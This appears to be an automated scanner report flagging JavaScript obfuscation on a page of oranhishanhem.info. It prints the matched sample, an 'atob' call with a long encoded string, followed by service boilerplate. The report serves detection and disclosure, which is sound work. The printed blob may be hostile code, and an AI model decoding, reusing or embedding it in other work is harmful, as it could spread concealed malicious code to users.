generic_javascript_obfuscation in oranhishanhem.info

On 2019-07-11T03:52:07.476154+00:00 we found suspicious pattern generic_javascript_obfuscation, type: Suspicious, (JavaScript obfuscation is frequently used to hide malicious code (or with hope to protect intellectual property)) in the page https://oranhishanhem.info/LJWNYDZ?tag_…

The suspicious code sample:

b'atob' … b'"OTdndjdiFV9YAxsbRUEHAAdSQBUVFUVaFQwDUEYGCA5RRQUJAlVPDw0FV0MVFRUBRwcBU1QQDhQGVBAHFANQElQUD1JCAhQHXhBTDgFRQQdcUwVUGxt1LRdPVhopIUBLfDI0f3BdBTR2QFhRGnpbWwZCdF1FEDVOCH8RTlYNXikhQmZiBQJzT3IlR21UAigCRXR9MhoCDUc1JXx4cC8yAG10FC8aDgIEAl1XfQhUGxtUCxlEXBVLVFRVWBQTFRUVBBpYSlJFWgcVFUVaFVpWFwJUUVZFWhUbG0VUGxsVSxBWVUQCWlFYWxQTG2IVF0cVFRUXRBUVFRdFFRUVF0IVFRUXQxUVFRdAFRUVF0EVFRUXThUVFRdPFRUVF0cHG2pLQRsbFUsQVlVEAlpZTFsLWllMWwtaFVpbCAVSGxsBF1tKUksQVlVEAlpRWFsUExtfVgsFUmQ"'

This feature is experimental so please feel free to contact us if you feel any of the reported issues is a false positive or you want to suggest a pattern that should be detected (we are using Yara standard).

Fully automated RESTful API is now available. Subscribe for your free trial today!